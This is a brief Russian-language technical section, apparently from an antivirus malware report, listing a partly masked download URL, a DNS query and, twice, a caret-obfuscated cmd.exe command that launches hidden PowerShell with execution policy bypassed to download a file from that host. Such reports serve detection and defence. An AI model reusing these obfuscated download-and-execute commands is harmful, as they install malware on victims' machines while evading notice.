Техническая информация
- http://mo####helthc.top/read.php?f=### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^w^ErS^he^L^L.eXE^ -^ExEc^u^TIonPOLicy by^P^ass^ -no^PrO^fiL^e^ ^-^Win^d^owsTYle h^Id^D^eN^ (N^E^W^-O^BJE^ct^ SYSTem.^NeT.WEbc^Li^e^Nt).DOwNlO^ADfIle('http://mo####helthc.t...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "PO^w^ErS^he^L^L.eXE^ -^ExEc^u^TIonPOLicy by^P^ass^ -no^PrO^fiL^e^ ^-^Win^d^owsTYle h^Id^D^eN^ (N^E^W^-O^BJE^ct^ SYSTem.^NeT.WEbc^Li^e^Nt).DOwNlO^ADfIle('http://mo####helthc.t...' (со скрытым окном)